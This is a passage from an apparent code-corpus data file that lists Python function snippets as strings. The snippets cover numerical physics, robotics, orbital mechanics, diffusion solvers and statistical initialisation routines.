self.T12_bishop = self.transformation_matrix_bishop(self.kappa2, self.phi2, self.seg_len2)\n self.T02_bishop = np.matmul(self.T01_bishop, self.T12_bishop)\n self.T01_frenet = self.transformation_matrix_frenet(self.kappa1, self.phi1, self.seg_len1)\n self.T12_frenet = self.transformation_matrix_frenet(self.kappa2, self.phi2, self.seg_len2)\n self.T02_frenet = np.matmul(self.T01_frenet, self.T12_frenet)\n self.tip_vec1 = np.matmul(self.T01_bishop, self.base)[0:3]\n self.tip_vec2 = np.matmul(self.T02_bishop, self.base)[0:3]\n # Frenet frames\n self.normal_vec_frenet1 = self.T01_frenet[0:3, 0]\n self.binormal_vec_frenet1 = self.T01_frenet[0:3, 1]\n self.tangent_vec_frenet1 = self.T01_frenet[0:3, 2]\n self.normal_vec_frenet2 = self.T02_frenet[0:3, 0]\n self.binormal_vec_frenet2 = self.T02_frenet[0:3, 1]\n self.tangent_vec_frenet2 = self.T02_frenet[0:3, 2]\n # Bishop frames\n self.normal_vec_bishop1 = self.T01_bishop[0:3, 0]\n self.binormal_vec_bishop1 = self.T01_bishop[0:3, 1]\n self.tangent_vec_bishop1 = self.T01_bishop[0:3, 2]\n self.normal_vec_bishop2 = self.T02_bishop[0:3, 0]\n self.binormal_vec_bishop2 = self.T02_bishop[0:3, 1]\n self.tangent_vec_bishop2 = self.T02_bishop[0:3, 2]", "def initialize_momentum_velocity(parameters):\n\n\tL = len(parameters)//2\n\tv = {}\n\n\tfor l in xrange(L):\n\t\tv[\"dW\" + str(l+1)] = np.zeros(parameters[\"W\" + str(l+1)].shape)\n\t\tv[\"db\" + str(l+1)] = np.zeros(parameters[\"b\" + str(l+1)].shape)\n\n\treturn v", "def construct_linear_system(self):\n N=self.grid.Ncells()\n Nbc = len(self.dirichlet_bcs)\n self.Ncalc=Ncalc = N - Nbc\n\n # map cells to forced values\n dirichlet = dict( [ (c,v) for c,v,xy in self.dirichlet_bcs])\n\n self.is_calc_c = is_calc_c = np.ones(N,np.bool8)\n for c,v,xy in self.dirichlet_bcs:\n is_calc_c[c] = False\n\n # is_calc_c[self.c_mask] = False\n\n # c_map is indexed by real cell indices, and returns the matrix index\n c_map = self.c_map = np.zeros(N,np.int32)\n self.c_map[is_calc_c] = np.arange(Ncalc)\n\n dzc=self.dzc\n dzf=self.dzf\n area_c=self.area_c\n\n meth='coo' # 'dok'\n if meth == 'dok':\n 
A=sparse.dok_matrix((Ncalc,Ncalc),np.float64)\n        else:\n            # construct the matrix from a sequence of indices and values\n            ij=[]\n            values=[] # successive value for the same i.j will be summed\n        \n        b = np.zeros(Ncalc,np.float64)\n        flux_per_gradient_j = -self.K_j * self.l_j * dzf / self.d_j * self.dt\n\n        self.grid.edge_to_cells() # makes sure that edges['cells'] exists.\n        \n        for j in range(self.grid.Nedges()):\n            e = self.grid.edges[j]\n            ic1,ic2 = e['cells']\n            \n            if ic1<0 or ic2<0 or e['deleted']:\n                continue # boundary edge, or deleted edge\n                \n            flux_per_gradient=flux_per_gradient_j[j]\n            \n            # this is the desired operation:\n            # Cdiff[ic1] -= flux_per_gradient / (An[ic1]*dzc) * (C[ic2] - C[ic1])\n            # Cdiff[ic2] += flux_per_gradient / (An[ic2]*dzc) * (C[ic2] - C[ic1])\n            # Where Cdiff is row, C is col\n\n            if is_calc_c[ic1] and is_calc_c[ic2]:\n                mic2 = c_map[ic2]\n                mic1 = c_map[ic1]\n                v1=flux_per_gradient / (area_c[ic1]*dzc[ic1])\n                v2=flux_per_gradient / (area_c[ic2]*dzc[ic2])\n                \n                if meth == 'dok':\n                    A[mic1,mic2] -= v1\n                    A[mic1,mic1] += v1\n                    A[mic2,mic2] += v2\n                    A[mic2,mic1] -= v2\n                else:\n                    ij.append( (mic1,mic2) ) ; values.append(-v1)\n                    ij.append( (mic1,mic1) ) ; values.append(v1)\n                    ij.append( (mic2,mic2) ) ; values.append(v2)\n                    ij.append( (mic2,mic1) ) ; values.append(-v2)\n                    \n            elif not ( is_calc_c[ic1] or is_calc_c[ic2] ):\n                # both are dirichlet, so nothing to do\n                pass\n            elif not is_calc_c[ic2]:\n                mic1 = c_map[ic1]\n                v=flux_per_gradient / (self.area_c[ic1]*dzc[ic1])\n                if meth == 'dok':\n                    A[mic1,mic1] += v\n                else:\n                    ij.append( (mic1,mic1) )\n                    values.append(v)\n\n                # roughly\n                # A[1,1]*x[1] + A[1,2]*x[2] + ... = b[1]\n                # but we already know x[2],\n                # A[1,1]*x[1] + ... = b[1] - A[1,2]*x[2]\n                # so flip the sign, multiply by known dirichlet value, and\n                # add to the RHS\n                b[mic1] += flux_per_gradient / (area_c[ic1]*dzc[ic1]) * dirichlet[ic2]\n            else: # not is_calc_c[c1]\n                mic2 = c_map[ic2]\n                # A[mic2,mic2] += flux_per_gradient / (area_c[ic2]*dzc[ic2])\n                # A[mic2,mic1] -= flux_per_gradient / (area_c[ic2]*dzc[ic2])\n\n                # A[mic2,mic2]*x[2] + A[mic2,mic1]*x[1] = b[2]\n                # ...\n                # A[mic2,mic2]*x[2] - flux_per_gradient / (area_c[ic2]*dzc[ic2])*x[1] = b[2]\n                # ...\n                # A[mic2,mic2]*x[2] = b[2] + flux_per_gradient / (area_c[ic2]*dzc[ic2])*x[1]\n                v=flux_per_gradient / (area_c[ic2]*dzc[ic2])\n                if meth == 'dok':\n                    A[mic2,mic2] += v\n                else:\n                    ij.append( (mic2,mic2) )\n                    values.append(v)\n                b[mic2] += flux_per_gradient / (area_c[ic2]*dzc[ic2]) * dirichlet[ic1]\n\n        # Used to test 'is not 0:' but modern python complains\n        if isinstance(self.alpha,np.ndarray): \n            for c in range(N):\n                if self.is_calc_c[c]:\n                    mic=self.c_map[c]\n                    v=self.alpha[c]*self.dt\n                    if meth == 'dok':\n                        A[mic,mic] -= v\n                    else:\n                        ij.append( (mic,mic) )\n                        values.append(-v)\n\n        # Flux boundary conditions:\n        for ic,value,xy in self.neumann_bcs:\n            mic=c_map[ic]\n            # make mass/time into concentration/step\n            # arrived at minus sign by trial and error.\n            # 2023-08-04: there was a bug here that used ic2 instead of ic.\n            b[mic] -= value/(area_c[ic]*dzc[ic]) * self.dt\n\n        if meth == 'dok':\n            self.A = sparse.coo_matrix(A)\n        else:\n            ijs=np.array(ij,dtype=np.int32)\n            data=np.array(values,dtype=np.float64)\n            A=sparse.coo_matrix( (data, (ijs[:,0],ijs[:,1]) ), shape=(Ncalc,Ncalc) )\n            self.A=A\n        \n        # report scale to get a sense of whether dt is too large\n        Ascale = A.diagonal().min()\n        log.debug(\"Ascale is %s\"%Ascale)\n\n        self.b = b", "def initialize(self):\n\n        myg = grid_setup(self.rp, ng=4)\n\n        bc_dens, bc_xodd, bc_yodd = bc_setup(self.rp)\n\n        my_data = 
patch.CellCenterData2d(myg)\n\n        my_data.register_var(\"density\", bc_dens)\n        my_data.register_var(\"x-velocity\", bc_xodd)\n        my_data.register_var(\"y-velocity\", bc_yodd)\n\n        # we'll keep the internal energy around just as a diagnostic\n        my_data.register_var(\"eint\", bc_dens)\n\n        # phi -- used for the projections. The boundary conditions\n        # here depend on velocity. At a wall or inflow, we already\n        # have the velocity we want on the boundary, so we want\n        # Neumann (dphi/dn = 0). For outflow, we want Dirichlet (phi\n        # = 0) -- this ensures that we do not introduce any tangential\n        # acceleration.\n        bcs = []\n        for bc in [self.rp.get_param(\"mesh.xlboundary\"),\n                   self.rp.get_param(\"mesh.xrboundary\"),\n                   self.rp.get_param(\"mesh.ylboundary\"),\n                   self.rp.get_param(\"mesh.yrboundary\")]:\n            if bc == \"periodic\":\n                bctype = \"periodic\"\n            elif bc in [\"reflect\", \"slipwall\"]:\n                bctype = \"neumann\"\n            elif bc in [\"outflow\"]:\n                bctype = \"dirichlet\"\n            bcs.append(bctype)\n\n        bc_phi = bnd.BC(xlb=bcs[0], xrb=bcs[1], ylb=bcs[2], yrb=bcs[3])\n\n        my_data.register_var(\"phi-MAC\", bc_phi)\n        my_data.register_var(\"phi\", bc_phi)\n\n        # gradp -- used in the projection and interface states. We'll do the\n        # same BCs as density\n        my_data.register_var(\"gradp_x\", bc_dens)\n        my_data.register_var(\"gradp_y\", bc_dens)\n\n        my_data.create()\n\n        self.cc_data = my_data\n\n        # some auxiliary data that we'll need to fill GC in, but isn't\n        # really part of the main solution\n        aux_data = patch.CellCenterData2d(myg)\n\n        aux_data.register_var(\"coeff\", bc_dens)\n        aux_data.register_var(\"source_y\", bc_yodd)\n\n        aux_data.create()\n        self.aux_data = aux_data\n\n        # we also need storage for the 1-d base state -- we'll store this\n        # in the main class directly.\n        self.base[\"rho0\"] = Basestate(myg.ny, ng=myg.ng)\n        self.base[\"p0\"] = Basestate(myg.ny, ng=myg.ng)\n\n        # now set the initial conditions for the problem\n        problem = importlib.import_module(f\"pyro.lm_atm.problems.{self.problem_name}\")\n        problem.init_data(self.cc_data, self.base, self.rp)\n\n        # Construct beta_0\n        gamma = self.rp.get_param(\"eos.gamma\")\n        self.base[\"beta0\"] = Basestate(myg.ny, ng=myg.ng)\n        self.base[\"beta0\"].d[:] = self.base[\"p0\"].d**(1.0/gamma)\n\n        # we'll also need beta_0 on vertical edges -- on the domain edges,\n        # just do piecewise constant\n        self.base[\"beta0-edges\"] = Basestate(myg.ny, ng=myg.ng)\n        self.base[\"beta0-edges\"].jp(1)[:] = \\\n            0.5*(self.base[\"beta0\"].v() + self.base[\"beta0\"].jp(1))\n        self.base[\"beta0-edges\"].d[myg.jlo] = self.base[\"beta0\"].d[myg.jlo]\n        self.base[\"beta0-edges\"].d[myg.jhi+1] = self.base[\"beta0\"].d[myg.jhi]", "def langevin_coefficients(\n        temperature,\n        dt,\n        friction,\n        masses):\n    vscale = np.exp(-dt*friction)\n    if friction == 0:\n        fscale = dt\n    else:\n        fscale = (1-vscale)/friction\n    kT = BOLTZ * temperature\n    nscale = np.sqrt(kT*(1-vscale*vscale)) # noise scale\n    invMasses = 1.0/masses\n    sqrtInvMasses = np.sqrt(invMasses)\n\n    ca = vscale\n    cb = fscale*invMasses\n    cc = nscale*sqrtInvMasses\n    return ca, cb, cc", "def initial_vel(T,N,masses,dim):\r\n    rand_v = np.random.uniform(-1,1,(N,dim)) #random velocities\r\n    sum_v = np.sum(rand_v, axis = 0)/N #Center-of-mass velocity\r\n    rand_v = rand_v - sum_v #Subtract cm-Motion\r\n    K = np.sum(np.sum(rand_v**2,axis = 1)*masses)/2 #Kinetic energy\r\n    T_act = 2/3*K/sc.k/N #Temperature\r\n    R_scale = T/T_act #Scaling factor\r\n    v = np.transpose(rand_v*np.sqrt(R_scale)) #rescale to reach T\r\n    return v", "def _set_angular_velocity(self):\n        nb_angular_velocities 
= 0\n sum_angular_velocities = 0\n for sl_id in range(self.nb_sl):\n w_list = self.sl_list[sl_id].angular_velocities\n nb_angular_velocities += len(w_list)\n sum_angular_velocities += np.sum(w_list)\n self.angular_velocity = sum_angular_velocities / nb_angular_velocities", "def first_lga(r, r_m, p, q):\n\n\t# Computation of the S/C velocity in the HRV frame\n\tP_HRV_ECI = np.linalg.inv(P_ECI_HRV())\n\tv_HRV = P_HRV_ECI.dot(r[3:])\n\n\t# Moon's velocity in the HRV\n\tv_M_HRV = np.array([0, 0, cst.V_M])\n\n\tv_inf, phi_m, theta_m = cart2sph(v_HRV - v_M_HRV)\n\n\t# S/C distance to the Earth [km]\n\td = np.linalg.norm(r[:3])\n\n\t# 1 - Computation of the polar angle of the S/C excess velocity after LGA to enter in p:q resonance with the Moon [rad]\n\t# ---------------------------------------------------------------------------------------------------------------------\n\t# S/C velocity after LGA to enter in a p:q resonance with the Moon [km/s]\n\tv = np.sqrt( 2*cst.mu_E/d - (2*np.pi * cst.mu_E / (cst.T_M * p/q))**(2/3) )\n\n\t# Polar angle of the S/C velocity at infinity after LGA [rad]\n\ttheta_p = np.arccos( (v**2 - cst.V_M**2 - v_inf**2) / (2 * cst.V_M * v_inf) )\n\n\n\t# 2 - Computation of the admissible longitude angles of the S/C velocity at infinity after LGA to enter in p:q resonance with the Moon [rad]\n\t# ------------------------------------------------------------------------------------------------------------------------------------------\n\t# Computation of the maximum rotation [rad]\n\tdelta_max = 2 * np.arcsin( cst.mu_M/(cst.R_M+r_m) / (v_inf**2 + cst.mu_M/(cst.R_M+r_m)) )\n\n\t# Possible longitude angles [rad]\n\tphi_p_arr = np.linspace(-np.pi, np.pi, 100)\n\n\t# Admissible longitude angles [rad]\n\tphi_p_adm = np.array([])\n\n\tdef admissible_longitude(phi_p):\n\t\treturn (np.cos(phi_m)*np.sin(theta_m)*np.sin(theta_p))*np.cos(phi_p) + \\\n\t\t\t (np.sin(phi_m)*np.sin(theta_m)*np.sin(theta_p))*np.sin(phi_p) + \\\n\t\t\t\tnp.cos(theta_m)*np.cos(theta_p) - np.cos(delta_max)\n\n\tfor phi_p in phi_p_arr:\n\t\tif admissible_longitude(phi_p) >= 0:\n\t\t\tphi_p_adm = np.append(phi_p_adm, phi_p)\n\n\n\tr_fs = np.ndarray(shape=(0, 8))\n\n\tt_span = [0, p/q * cst.T_M]\n\tt_eval = np.linspace(t_span[0], t_span[-1], 10000)\n\n\tfig = plt.figure()\n\tax = fig.gca(projection='3d')\n\n\tfor k, phi_p in enumerate(phi_p_adm):\n\n\t\t# Computation of the post-LGA S/C velocity in the ECI frame\n\t\tv_HRV_p = sph2cart([v_inf, phi_p, theta_p]) + v_M_HRV\n\t\tv_ECI_p = P_ECI_HRV().dot(v_HRV_p)\n\t\tr0 = np.concatenate((r[:3], v_ECI_p))\n\n\t\tprint(\"HRV : [{}, {}, {}]\".format(v_inf, phi_p*180/np.pi, theta_p*180/np.pi))\n\t\tprint(\"Velocity : {} km/s\".format(np.linalg.norm(v_M_HRV)))\n\t\tinput()\n\n\t\tsolution = solve_ivp(fun=kepler, t_span=t_span, t_eval=t_eval, y0=r0, rtol=1e-12, atol=1e-12)\n\t\tr_f = solution.y[:, -1]\n\n\t\tr_fs = np.append(r_fs, np.concatenate(([phi_p], [theta_p], r_f)))\n\n\t\tax.plot(solution.y[0], solution.y[1], solution.y[2], '-', color='blue', linewidth=1)\n\n\tplot_env_3D(ax)\n\tplt.show()\n\n\tr_fs = r_fs.reshape(int(len(r_fs)/8), 8)\n\n\treturn r_fs, solution.t", "def spatial_database():\n return UniformVelModel()", "def test_y_vector_init(self):\n # If you change the y-vector ordering, change here too #Y_VECTOR_CHANGESITE\n\n eng_fields = np.zeros(EngineeringState.N_ENGINEERING_FIELDS)\n component_array = eng_fields[EngineeringState._COMPONENT_START_INDEX:EngineeringState._COMPONENT_END_INDEX]\n for comp_i in range(0, N_COMPONENTS):\n component_array[comp_i + 
N_COMPONENTS * 0] = True # connected\n            component_array[comp_i + N_COMPONENTS * 1] = 1 + (0.01 * comp_i) # capacity\n            component_array[comp_i + N_COMPONENTS * 2] = 222200 + comp_i # temperature\n            component_array[comp_i + N_COMPONENTS * 3] = comp_i % 2 # coolant_hab_one\n            component_array[comp_i + N_COMPONENTS * 4] = True # coolant_hab_two\n            component_array[comp_i + N_COMPONENTS * 5] = False # coolant_ayse\n\n        coolant_array = eng_fields[EngineeringState._COOLANT_START_INDEX:EngineeringState._COOLANT_END_INDEX]\n        for cool_i in range(0, N_COOLANT_LOOPS):\n            coolant_array[cool_i + N_COOLANT_LOOPS * 0] = 555500 + cool_i # coolant_temp\n            coolant_array[cool_i + N_COOLANT_LOOPS * 1] = cool_i % 2 # primary_pump_on\n            coolant_array[cool_i + N_COOLANT_LOOPS * 2] = True # secondary_pump_on\n\n        rad_array = eng_fields[EngineeringState._RADIATOR_START_INDEX:EngineeringState._RADIATOR_END_INDEX]\n        for rad_i in range(0, N_RADIATORS):\n            rad_array[rad_i + N_RADIATORS * 0] = rad_i % 4 # attached_to_coolant_loop\n            rad_array[rad_i + N_RADIATORS * 1] = rad_i % 2 # functioning\n\n        y0 = np.concatenate((np.array([\n            0x111, 0x222, # x\n            0x333, 0x444, # y\n            0x555, 0x777, # vx\n            0x888, 0x999, # vy\n            0.01, 0.02, # heading\n            0.03, 0.04, # spin\n            0xEEE, 0xFFF, # fuel\n            5, 6, # throttle\n            1, -1, # only First is landed on Second\n            0, 1, # Second is broken\n            common.SRB_EMPTY,\n            1 # time_acc\n        ]),\n            eng_fields\n        ))\n\n        ps = PhysicsState(y0, self.proto_state)\n        self.assertTrue(np.array_equal(ps.y0(), y0.astype(ps.y0().dtype)))\n        self.assertEqual(ps['First'].landed_on, 'Second')\n\n        proto_state = ps.as_proto()\n        proto_state.timestamp = 50\n        self.assertEqual(proto_state.entities[0].x, 0x111)\n        self.assertEqual(proto_state.entities[0].y, 0x333)\n        self.assertEqual(proto_state.entities[1].x, 0x222)\n        self.assertEqual(proto_state.entities[1].y, 0x444)\n        self.assertEqual(proto_state.entities[0].vx, 0x555)\n        self.assertEqual(proto_state.entities[0].vy, 0x888)\n        self.assertEqual(proto_state.entities[1].vx, 0x777)\n        self.assertEqual(proto_state.entities[1].vy, 0x999)\n        self.assertEqual(proto_state.entities[0].heading, 0.01)\n        self.assertEqual(proto_state.entities[1].heading, 0.02)\n        self.assertEqual(proto_state.entities[0].spin, 0.03)\n        self.assertEqual(proto_state.entities[1].spin, 0.04)\n        self.assertEqual(proto_state.entities[0].fuel, 0xEEE)\n        self.assertEqual(proto_state.entities[1].fuel, 0xFFF)\n        self.assertEqual(proto_state.entities[0].landed_on, 'Second')\n        self.assertEqual(proto_state.entities[1].landed_on, '')\n        self.assertEqual(proto_state.timestamp, 50)\n        self.assertTrue(proto_state.entities[1].broken)\n\n        for i, component in enumerate(ps.engineering.components):\n            self.assertEqual(component.connected, True, msg=i)\n            self.assertEqual(component.capacity, 1 + (0.01 * i), msg=i)\n            self.assertEqual(component.temperature, 222200 + i, msg=i)\n            self.assertEqual(component.coolant_hab_one, bool(i % 2), msg=i)\n            self.assertEqual(component.coolant_hab_two, True, msg=i)\n            self.assertEqual(component.coolant_ayse, False, msg=i)\n\n        for i, coolant in enumerate(ps.engineering.coolant_loops):\n            self.assertEqual(coolant.coolant_temp, 555500 + i, msg=i)\n            self.assertEqual(coolant.primary_pump_on, bool(i % 2), msg=i)\n            self.assertEqual(coolant.secondary_pump_on, True, msg=i)\n\n        for i, radiator in enumerate(ps.engineering.radiators):\n            self.assertEqual(radiator.attached_to_coolant_loop, i % 4, msg=i)\n            self.assertEqual(radiator.functioning, bool(i % 2), msg=i)", "def vel_inicial(x): #Initial velocity as a vector of zeros\r\n    return 
np.zeros_like(x)", "def LRC(self):\n pseudo_inverse = np.linalg.pinv(self.phi)\n self.g = np.dot(pseudo_inverse, self.Y)\n self.b = self.g[-1]\n self.g = self.g[:-1]", "def compute_vel(self, state, goal):\n\n \"\"\"\n Unicycle model control law:\n [v;w] = [kp 0 0; 0 ka kb]*[p;a;b]\n v = commanded linear velocity of robot\n w = commanded rotational velcoity of robot\n kp = gain parameter where kp > 0\n ka = gain parameter where ka - kp > 0\n kb = gain parameter where kb < 0\n p = distance from robot to goal\n a = angle between current robot heading and heading to goal\n b = error between current heading to goal and target end heading\n \"\"\"\n \n #print('state,goal,v,w')\n #print(state)\n #print(goal)\n\n xr = state[0][0] # m in world frame\n yr = state[1][0] # m in world frame\n thetar = state[2][0] #rads\n\n xg = goal[0] # m in world frame\n yg = goal[1] # m in world frame\n\n dy = yg - yr\n dx = xg - xr\n\n #print('')\n #print(state)\n #print(goal)\n \n # Calculate a\n a = -1*thetar + math.atan2(dy,dx)\n\n #print(a)\n\n if a > math.pi:\n a = a - 2*math.pi\n\n if a < -1*math.pi:\n a = a + 2*math.pi\n\n #print(a)\n\n # Set omega according to control law\n omega = self.ka*a\n if math.fabs(omega) > self.MAX_OMEGA:\n if omega > 0:\n omega = self.MAX_OMEGA\n else:\n omega = -1*self.MAX_OMEGA\n\n # Calculate P\n p = math.sqrt(dy*dy + dx*dx)\n\n # Set v \n v = self.kp*p\n if v > self.MAX_SPEED:\n v = self.MAX_SPEED\n\n # set the done value\n done = (p <= self.done_distance)\n\n #print(v)\n #print(omega)\n\n out_tuple = (v, omega, done)\n \n return out_tuple", "def init():\n global balls, super_balls\n\n balls = [gen_ball() for _ in range(number_of_balls)]\n super_balls = []\n generate_velocity_all_balls()", "def _position_and_velocity(self, jd):\n pos, vel = terra(self.latitude.radians, self.longitude.radians,\n self.elevation.au, jd.gast)\n pos = einsum('ij...,j...->i...', jd.MT, pos)\n vel = einsum('ij...,j...->i...', jd.MT, vel)\n return pos, vel", "def initialize_variables(self, data, parameters) -> object:\n\n val = SimpleNamespace(**parameters)\n\n # extract parameters\n flor_brightness_guess = val.flor_brightness_guess\n gain = val.gain\n mu_flor_mean = val.mu_flor_mean\n mu_flor_shape = val.mu_flor_shape\n mu_back_mean = val.mu_back_mean\n mu_back_shape = val.mu_back_shape\n transitions_conc = val.transitions_conc\n load_weight = val.load_weight\n num_end = val.num_end\n num_load = val.num_load\n num_states = val.num_states\n num_together = val.num_together\n\n # set up numbers\n num_rois, num_data = data.shape\n # use ruler method to set initial guess for the number of fluorophores\n num_estimated = np.max(np.max(data, axis=1) - np.min(data, axis=1)) / flor_brightness_guess\n if num_end is None:\n # assume last one percent of the data is photobleached\n num_end = int(round(num_data / 100))\n if num_load is None:\n num_load = int(round(1.5 * num_estimated, -1))\n\n # set up priors\n if num_states == 2:\n bright_idx = np.array([1, 0])\n else:\n bright_idx = np.array([0, *np.ones(num_states - 2), 0])\n if mu_flor_mean is None:\n mu_flor_mean = bright_idx * flor_brightness_guess / gain\n if np.isscalar(mu_flor_shape):\n # place a sharp prior on fluorophore brightness\n mu_flor_shape = bright_idx * mu_flor_shape\n if mu_back_mean is None:\n # last data point is the estimate for background\n mu_back_mean = np.mean(data[:, -num_end:], axis=1) / gain\n if np.isscalar(mu_back_shape):\n # place a sharp prior on background\n mu_back_shape = np.ones(num_rois) * mu_back_shape\n if transitions_conc 
is None:\n pi = np.ones((num_states + 1, num_states))\n # fluorophores cannot start photobleached\n pi[-1, -1] = 0\n # increase self transition\n pi[:-1, :] += 100 * np.eye(num_states)\n # photobleached can only self transition\n pi[-2, :-1] = 0\n # do not allow dark to bleached transitions\n if num_states > 2:\n pi[0, -1] = 0\n # normalize the matrix\n for k in range(num_states + 1):\n pi[k, :] /= np.sum(pi[k, :])\n transitions_conc = pi\n\n # calculate joint photostate combinations\n \"\"\"\n The joint photostate combinations are needed to sample\n multiple phototrajectories simultaneously. That is,\n instead of sampling the phototrajectory of fluorophore A\n and then sampling the phototrajectory of fluorophore B,\n we sample the joint phototrajectory of fluorophore A and\n B in order to get better mixing. If, for example, each\n fluorphore can either be bright or dark, then the joint\n state space would have four components:\n 1) A bright and B bright\n 2) A bright and B dark\n 3) A dark and B bright\n 4) A dark and B dark\n Here we generalize to include multiple states per\n fluorophore and more than 2 fluorophores per joint\n state space.\n \"\"\"\n num_combos = num_states ** num_together\n state_combos = np.zeros((num_combos, num_together), dtype=int)\n for k in range(num_together):\n state_combos[:, k] = np.tile(\n np.repeat(np.arange(num_states), num_states ** (num_together - k - 1)),\n num_states ** k\n )\n # reduce number of joint photostate combinations by equating states with equal brightness\n \"\"\"\n Note that many of the states in the joint state space\n will have the same brightness. For example, A dark with\n B brigth will be the same brightness as A bright with B\n dark. Therefore, to speed up calculations, instead of \n caclulating brightness of A-bright-B-dark and A-dark-B-bright\n seperately, we can calculate the brightness of\n one-fluorophore-bright and use the value for both of the\n above joint states.\n \"\"\"\n degenerate_combos = state_combos.copy()\n for k in np.where(val.mu_flor_mean == 0)[0]:\n degenerate_combos[degenerate_combos == k] = num_states - 1\n degenerate_combos = np.sort(degenerate_combos, axis=1)\n\n # load val with calculated values\n val.num_data = num_data\n val.num_rois = num_rois\n val.num_end = num_end\n val.num_load = num_load\n val.mu_flor_mean = mu_flor_mean\n val.mu_flor_shape = mu_flor_shape\n val.mu_back_mean = mu_back_mean\n val.mu_back_shape = mu_back_shape\n val.transitions_conc = transitions_conc\n val.load_weight = load_weight\n val.num_combos = num_combos\n val.state_combos = state_combos\n val.degenerate_combos = degenerate_combos\n\n # set up variables\n states = (num_states - 1) * np.ones((num_rois, num_load, num_data), dtype=int)\n num_flor = np.zeros(num_rois)\n mu_flor = stats.norm.rvs(mu_flor_mean, .01) * (mu_flor_mean > 0)\n mu_back = stats.norm.rvs(mu_back_mean, .01)\n transitions = Dirichlet.sample(1000 * transitions_conc)\n val.states = states\n val.num_flor = num_flor\n val.mu_flor = mu_flor\n val.mu_back = mu_back\n val.transitions = transitions\n val.P = self.posterior(val)\n\n return val", "def __generate_LSP_angles__(self):\n self.LSP_ANGLES = np.linspace(0, self._range_lsp_angle, ArrayInfo.len_lsp) - (self._range_lsp_angle / 2)\n self.LSP_MIN_ANGLE = np.min(self.LSP_ANGLES) - 0.5 # Angles outside of this range are discarded\n self.LSP_MAX_ANGLE = np.max(self.LSP_ANGLES) + 0.5 # Angles outside of this range are discarded", "def laplace_value(self, s, dimensional: bool = True, eps_zz: np.ndarray = None):\n I0, I1, 
J0, J1, ln, exp, sqrt = self.get_core_equations()\n t0_tg, tg, strain_rate, E1, E3, v21, v31 = self.get_predefined_constants()\n\n delta1, delta2, delta3, C11, C12, C13, C33, C0, C1, C2 = self.get_calculable_constants()\n\n if eps_zz is None:\n if t0_tg is None: # Stepwise strain (not ramped)\n # Recall e^x ≈ 1+x for small x\n # lim as t0->0 of (1 - exp(-t0_tg * s)) / (s*s)\n # = (1- (1-t0_tg*s) )/(s*s)\n # = ( t0_tg*s )/(s*s) = t0_tg/s\n eps_zz = strain_rate * tg * 1/s\n else:\n eps_zz = strain_rate * tg * (1 - exp(-t0_tg * s)) / (s*s)\n\n #I1rts = I1(sqrt(s))\n I1rts_s = I1(sqrt(s)) / sqrt(s)\n I0rts = I0(sqrt(s))\n\n # F is the load intensity\n F = (C1*I0rts - C2*C0*I1rts_s) / (I0rts - C0*I1rts_s) * eps_zz\n\n if dimensional:\n F = F * (C11-C12)/2\n\n return F", "def init_dyn(self, arr_x, arr_y, range_x, range_y, d_x, d_y, a, b, c, n_p, temp, m):\n # call potential function\n gp = GeneratePotential(arr_x, arr_y, range_x, range_y, d_x, d_y, a, b, c)\n # get potential, force and numbers of grid\n pot, fx, fy, n_x, n_y = gp.gen_pot()\n # assign initial positions\n pos_x, pos_y = self.assgin_pos(range_x, range_y, n_p)\n # assign initial velocities\n vel_x, vel_y = self.assign_vel(n_p, temp, m)\n # get slopes for interpolation\n k_pot, k_fx, k_fy = self.grid_interp(pot, fx, fy, n_x, n_y, d_y)\n return pot, fx, fy, n_x, n_y, pos_x, pos_y, vel_x, vel_y, k_pot, k_fx, k_fy", "def _set_leg_params(self):\n self.p = 0.01600\n self.q = 0.00000\n self.r = 0.02000\n self.c = 0.01811\n self.u = 0.00000\n self.v = 0.00000\n self.e = -0.06000\n self.h = -0.02820\n self.s = 0.02200\n self.d1 = 0.0\n self.d2 = 0.0\n self.d3 = 0.0\n self.stability = 0.0", "def initialize_position(self):\n self.x = (self.cell_xl**3 +\n (self.cell_xr**3 - self.cell_xl**3) *\n np.random.rand(1)[0])**(1./3.)", "def generate_initial_positions(ntemps, nwalkers, ref_time, fit_qm=False,\n prior_params=prior_params_default, rseed=None):\n \n if rseed is not None:\n np.random.seed(rseed)\n \n par_list = []\n \n # Omega\n par_list.append(st.uniform.rvs(loc=0, scale=180,\n size=(nwalkers, ntemps)))\n\n # omega\n par_list.append(st.uniform.rvs(loc=-180, scale=360,\n size=(nwalkers, ntemps)))\n \n # i\n par_list.append(st.uniform.rvs(loc=0, scale=90,\n size=(nwalkers, ntemps)))\n \n # a\n par_list.append(st.halfnorm.rvs(size=(nwalkers, ntemps),\n **prior_params['a_axis']))\n \n # ecc\n par_list.append(st.uniform.rvs(loc=0, scale=1, size=(nwalkers, ntemps)))\n \n # period, T0\n period = st.uniform.rvs(size=(nwalkers, ntemps), **prior_params['period'])\n T0 = np.array([st.uniform.rvs(loc=ref_time, scale=p, size=1)\n for p in period.flatten()]).reshape((nwalkers, ntemps))\n par_list.append(period)\n par_list.append(T0)\n\n # mu_delta\n par_list.append(st.norm.rvs(size=(nwalkers, ntemps),\n **prior_params['mu_delta']))\n \n # mu_alpha\n par_list.append(st.norm.rvs(size=(nwalkers, ntemps),\n **prior_params['mu_alpha']))\n \n # pi_parallax\n par_list.append(st.halfnorm.rvs(size=(nwalkers, ntemps),\n **prior_params['pi_p']))\n \n # Ddelta_ref\n par_list.append(st.norm.rvs(size=(nwalkers, ntemps),\n **prior_params['Ddelta_ref']))\n \n # Dalpha_ref\n par_list.append(st.norm.rvs(size=(nwalkers, ntemps),\n **prior_params['Dalpha_ref']))\n \n # q_m\n if fit_qm:\n par_list.append(st.halfnorm.rvs(size=(nwalkers, ntemps),\n **prior_params['q_m']))\n \n \n p0 = np.array(par_list).T\n \n return p0", "def getVelocity(grid=None, ppar=None):\n\n vel = np.zeros([grid.nx, grid.ny, grid.nz, 3], dtype=np.float64)\n return vel", "def 
